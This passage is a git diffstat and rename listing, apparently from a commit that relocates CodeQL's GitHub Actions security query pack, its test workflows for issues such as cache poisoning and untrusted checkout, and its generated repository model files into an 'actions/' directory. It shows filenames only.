.../.github/workflows/neg_direct_cache4.yml | 0 .../.github/workflows/neg_direct_cache5.yml | 0 .../workflows/neg_poisonable_step1.yml | 0 .../workflows/neg_poisonable_step2.yml | 0 .../.github/workflows/poisonable_step1.yml | 0 .../.github/workflows/poisonable_step2.yml | 0 .../.github/workflows/poisonable_step3.yml | 0 .../.github/workflows/poisonable_step4.yml | 0 .../.github/workflows/poisonable_step5.yml | 0 .../CachePoisoningViaCodeInjection.expected | 0 .../CachePoisoningViaCodeInjection.qlref | 0 .../CachePoisoningViaDirectCache.expected | 0 .../CachePoisoningViaDirectCache.qlref | 0 .../CachePoisoningViaPoisonableStep.expected | 0 .../CachePoisoningViaPoisonableStep.qlref | 0 .../CWE-367/.github/workflows/actor.yml | 0 .../CWE-367/.github/workflows/comment.yml | 0 .../CWE-367/.github/workflows/deployment1.yml | 0 .../CWE-367/.github/workflows/deployment2.yml | 0 .../CWE-367/.github/workflows/label.yml | 0 .../CWE-367/.github/workflows/label_actor.yml | 0 .../CWE-367/.github/workflows/test0.yml | 0 .../CWE-367/.github/workflows/test1.yml | 0 .../CWE-367/.github/workflows/test2.yml | 0 .../CWE-367/.github/workflows/test3.yml | 0 .../CWE-367/.github/workflows/test4.yml | 0 .../CWE-367/.github/workflows/test5.yml | 0 .../CWE-367/.github/workflows/test6.yml | 0 .../UntrustedCheckoutTOCTOUCritical.expected | 0 .../UntrustedCheckoutTOCTOUCritical.qlref | 0 .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 0 .../CWE-571/.github/workflows/test1.yml | 0 .../CWE-571/.github/workflows/test2.yml | 0 .../ExpressionIsAlwaysTrueCritical.expected | 0 .../ExpressionIsAlwaysTrueCritical.qlref | 0 .../ExpressionIsAlwaysTrueHigh.expected | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 0 .../actions/dangerous-git-checkout/action.yml | 0 .../actions/download-artifact-2/action.yaml | 0 .../actions/download-artifact/action.yaml | 0 .../workflows/actor_trusted_checkout.yml | 0 .../workflows/artifactpoisoning101.yml | 0 
.../.github/workflows/artifactpoisoning11.yml | 0 .../.github/workflows/artifactpoisoning12.yml | 0 .../.github/workflows/artifactpoisoning21.yml | 0 .../.github/workflows/artifactpoisoning22.yml | 0 .../.github/workflows/artifactpoisoning31.yml | 0 .../.github/workflows/artifactpoisoning32.yml | 0 .../.github/workflows/artifactpoisoning33.yml | 0 .../.github/workflows/artifactpoisoning34.yml | 0 .../.github/workflows/artifactpoisoning41.yml | 0 .../.github/workflows/artifactpoisoning42.yml | 0 .../.github/workflows/artifactpoisoning51.yml | 0 .../.github/workflows/artifactpoisoning52.yml | 0 .../.github/workflows/artifactpoisoning53.yml | 0 .../.github/workflows/artifactpoisoning71.yml | 0 .../.github/workflows/artifactpoisoning81.yml | 0 .../.github/workflows/artifactpoisoning82.yml | 0 .../.github/workflows/artifactpoisoning91.yml | 0 .../.github/workflows/artifactpoisoning92.yml | 0 .../CWE-829/.github/workflows/auto_ci.yml | 0 .../CWE-829/.github/workflows/dependabot1.yml | 0 .../CWE-829/.github/workflows/dependabot2.yml | 0 .../CWE-829/.github/workflows/dependabot3.yml | 0 .../TestRepo/.github/workflows/formal.yml | 0 .../TestRepo/.github/workflows/reusable.yml | 0 .../CWE-829/.github/workflows/formal.yml | 0 .../CWE-829/.github/workflows/gitcheckout.yml | 0 .../issue_comment_3rd_party_action.yml | 0 .../workflows/issue_comment_direct.yml | 0 .../workflows/issue_comment_heuristic.yml | 0 .../workflows/issue_comment_octokit.yml | 0 .../workflows/issue_comment_octokit2.yml | 0 .../workflows/label_trusted_checkout1.yml | 0 .../workflows/label_trusted_checkout2.yml | 0 .../CWE-829/.github/workflows/level0.yml | 0 .../CWE-829/.github/workflows/mend.yml | 0 .../CWE-829/.github/workflows/poc.yml | 0 .../CWE-829/.github/workflows/poc2.yml | 0 .../CWE-829/.github/workflows/poc3.yml | 0 .../.github/workflows/pr-workflow-fork.yaml | 0 .../CWE-829/.github/workflows/pr-workflow.yml | 0 .../workflows/priv_pull_request_checkout.yml | 0 .../.github/workflows/resolve-args.yml 
| 0 .../.github/workflows/reusable_caller1.yaml | 0 .../.github/workflows/reusable_caller2.yaml | 0 .../.github/workflows/reusable_caller3.yaml | 0 .../.github/workflows/reusable_local.yml | 0 .../CWE-829/.github/workflows/test.yml | 0 .../CWE-829/.github/workflows/test1.yml | 0 .../CWE-829/.github/workflows/test10.yml | 0 .../CWE-829/.github/workflows/test11.yml | 0 .../CWE-829/.github/workflows/test12.yml | 0 .../CWE-829/.github/workflows/test13.yml | 0 .../CWE-829/.github/workflows/test14.yml | 0 .../CWE-829/.github/workflows/test15.yml | 0 .../CWE-829/.github/workflows/test16.yml | 0 .../CWE-829/.github/workflows/test17.yml | 0 .../CWE-829/.github/workflows/test18.yml | 0 .../CWE-829/.github/workflows/test19.yml | 0 .../CWE-829/.github/workflows/test2.yml | 0 .../CWE-829/.github/workflows/test20.yml | 0 .../CWE-829/.github/workflows/test21.yml | 0 .../CWE-829/.github/workflows/test22.yml | 0 .../CWE-829/.github/workflows/test23.yml | 0 .../CWE-829/.github/workflows/test24.yml | 0 .../CWE-829/.github/workflows/test25.yml | 0 .../CWE-829/.github/workflows/test26.yml | 0 .../CWE-829/.github/workflows/test27.yml | 0 .../CWE-829/.github/workflows/test28.yml | 0 .../CWE-829/.github/workflows/test29.yml | 0 .../CWE-829/.github/workflows/test3.yml | 0 .../CWE-829/.github/workflows/test4.yml | 0 .../CWE-829/.github/workflows/test5.yml | 0 .../CWE-829/.github/workflows/test6.yml | 0 .../CWE-829/.github/workflows/test7.yml | 0 .../CWE-829/.github/workflows/test8.yml | 0 .../CWE-829/.github/workflows/test9.yml | 0 .../.github/workflows/unpinned_tags.yml | 0 .../.github/workflows/untrusted_checkout.yml | 0 .../.github/workflows/untrusted_checkout2.yml | 0 .../.github/workflows/untrusted_checkout3.yml | 0 .../.github/workflows/untrusted_checkout4.yml | 0 .../workflows/untrusted_checkout_5.yml | 0 .../workflows/untrusted_checkout_6.yml | 0 .../workflow_run_untrusted_checkout.yml | 0 .../workflow_run_untrusted_checkout_2.yml | 0 .../workflow_run_untrusted_checkout_3.yml | 0 
.../ArtifactPoisoningCritical.expected | 0 .../CWE-829/ArtifactPoisoningCritical.qlref | 0 .../CWE-829/ArtifactPoisoningMedium.expected | 0 .../CWE-829/ArtifactPoisoningMedium.qlref | 0 .../ArtifactPoisoningPathTraversal.expected | 0 .../ArtifactPoisoningPathTraversal.qlref | 0 .../CWE-829/UnpinnedActionsTag.expected | 0 .../Security/CWE-829/UnpinnedActionsTag.qlref | 0 .../UntrustedCheckoutCritical.expected | 0 .../CWE-829/UntrustedCheckoutCritical.qlref | 0 .../CWE-829/UntrustedCheckoutHigh.expected | 0 .../CWE-829/UntrustedCheckoutHigh.qlref | 0 .../CWE-829/UntrustedCheckoutMedium.expected | 0 .../CWE-829/UntrustedCheckoutMedium.qlref | 0 .../UnversionedImmutableAction.expected | 0 .../CWE-829/UnversionedImmutableAction.qlref | 0 .../CWE-918/.github/workflows/test.yml | 0 .../Security/CWE-918/RequestForgery.expected | 0 .../Security/CWE-918/RequestForgery.qlref | 0 .../.github/workflows/malformed.yml | 0 .../SyntaxError/SyntaxError.expected | 0 .../query-tests/SyntaxError/SyntaxError.qlref | 0 .../ql}/test/query-tests/SyntaxError/options | 0 .../workflows/defaultable_workflow.yml | 0 .../should_be_using_advanced_setup.yml | 0 .../UnnecessaryUseOfAdvancedConfig.expected | 0 .../UnnecessaryUseOfAdvancedConfig.qlref | 0 codeql-workspace.yml | 4 -- 1322 files changed, 101 deletions(-) delete mode 100644 .github/workflows/publish.yml delete mode 100644 .github/workflows/test.yml delete mode 100644 .gitignore delete mode 100644 BUILD.bazel rename {extractor => actions/extractor}/BUILD.bazel (100%) rename {extractor => actions/extractor}/codeql-extractor.yml (100%) rename {extractor => actions/extractor}/tools/autobuild-impl.ps1 (100%) rename {extractor => actions/extractor}/tools/autobuild.cmd (100%) rename {extractor => actions/extractor}/tools/autobuild.sh (100%) rename {ql => actions/ql}/lib/actions.qll (100%) rename {ql => actions/ql}/lib/codeql-pack.lock.yml (100%) rename {ql => actions/ql}/lib/codeql/Locations.qll (100%) rename {ql => 
actions/ql}/lib/codeql/actions/Ast.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Bash.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Cfg.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Consistency.ql (100%) rename {ql => actions/ql}/lib/codeql/actions/DataFlow.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Helper.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/PowerShell.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/TaintTracking.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ast/internal/Ast.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ast/internal/Yaml.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/config/Config.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/config/ConfigExtensions.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/controlflow/BasicBlocks.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/controlflow/internal/Cfg.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/ExternalFlow.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/FlowSources.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/FlowSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/TaintSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll (100%) rename {ql => 
actions/ql}/lib/codeql/actions/ideContextual/IDEContextual.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/ideContextual/printAst.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ArgumentInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ArtifactPoisoningQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CachePoisoningQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CodeInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/CommandInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/ControlChecks.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/EnvPathInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/EnvVarInjectionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/OutputClobberingQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/PoisonableSteps.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/RequestForgeryQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/SecretExfiltrationQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/SelfHostedQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UntrustedCheckoutQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UseOfKnownVulnerableActionQuery.qll (100%) rename {ql => actions/ql}/lib/codeql/actions/security/UseOfUnversionedImmutableAction.qll (100%) rename {ql => actions/ql}/lib/codeql/files/FileSystem.qll (100%) rename {ql => actions/ql}/lib/ext/config/argument_injection_sinks.yml (100%) rename {ql => actions/ql}/lib/ext/config/context_event_map.yml (100%) rename {ql => actions/ql}/lib/ext/config/externally_triggereable_events.yml (100%) rename {ql => actions/ql}/lib/ext/config/immutable_actions.yml (100%) rename {ql => actions/ql}/lib/ext/config/poisonable_steps.yml (100%) rename {ql => 
actions/ql}/lib/ext/config/untrusted_event_properties.yml (100%) rename {ql => actions/ql}/lib/ext/config/untrusted_gh_command.yml (100%) rename {ql => actions/ql}/lib/ext/config/untrusted_git_command.yml (100%) rename {ql => actions/ql}/lib/ext/config/vulnerable_actions.yml (100%) rename {ql => actions/ql}/lib/ext/config/workflow_runtime_data.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/adap_flower.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/anchore_grype.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/anchore_syft.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/angular_dev-infra.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ansible_awx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_arrow.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_brpc.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_camel-k.model.yml (100%) 
rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_camel.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_flink.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_nuttx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_opendal.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_pekko.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/apache_superset.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/armadaproject_armada.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/armbian_build.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0.net.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/auth0_auth0.swift.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/autogluon_autogluon.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/avaiga_taipy.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws-amplify_amplify-cli.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws-powertools_powertools-lambda-python.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/aws_amazon-vpc-cni-k8s.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/aws_karpenter-provider-aws.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/awslabs_amazon-eks-ami.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/awslabs_aws-lambda-rust-runtime.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/azerothcore_azerothcore-wotlk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/azure_azure-datafactory.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/badges_shields.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/balena-io_etcher.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/balena-os_balena-engine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ben-manes_caffeine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/bokeh_bokeh.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/botpress_botpress.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/braintree_braintree-android-drop-in.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/braintree_braintree_android.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/broadinstitute_gatk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/canonical_multipass.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chia-network_actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chia-network_chia-blockchain.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/chipsalliance_chisel.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/chocobozzz_peertube.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cilium_cilium-cli.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cilium_cilium.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/citusdata_citus.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/clerk_javascript.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloud-custodian_cloud-custodian.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloudflare_workers-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cloudfoundry_cloud_controller_ng.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coder_coder.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coil-kt_coil.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/commaai_openpilot.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/conan-io_conan-center-index.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/corretto_corretto-8.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cosmos_cosmos-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/coturn_coturn.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/crunchydata_postgres-operator.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/davatorium_rofi.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/debezium_debezium.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/diggerhq_digger.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/discourse_.github.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/elementor_elementor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/emberjs_data.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/emqx_emqx.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/erlang_otp.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/esphome_esphome.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expensify_app.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expo_expo.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_buck2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_flow.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebook_yoga.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/felangel_bloc.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/fossasia_visdom.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/freckle_stack-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/getsentry_action-release.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/github_codeql-action.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/github_ruby.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/gittools_gitversion.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/go-spatial_tegola.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/goauthentik_authentik.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/godotengine_godot.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/google_dagger.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googleapis_java-cloud-bom.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googleapis_sdk-platform-java.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/googlecloudplatform_dataflowtemplates.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/googlecloudplatform_magic-modules.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/gravitational_teleport.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/grote_transportr.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/hashicorp_nomad.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/hashicorp_terraform.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/hashicorp_vault.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/home-assistant_android.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/homebrew_actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/hyperledger_aries-cloudagent-python.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/hyperledger_fabric-samples.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/igniterealtime_openfire.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/infracost_actions.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ipfs_aegir.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kserve_kserve.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubeflow_katib.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/lancedb_lance.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/lerna_lerna.model.yml (100%) rename {ql => 
actions/ql}/lib/ext/generated/composite-actions/lf-edge_eve.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml (100%) rename {ql => actions/ql}/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml (100%) rename 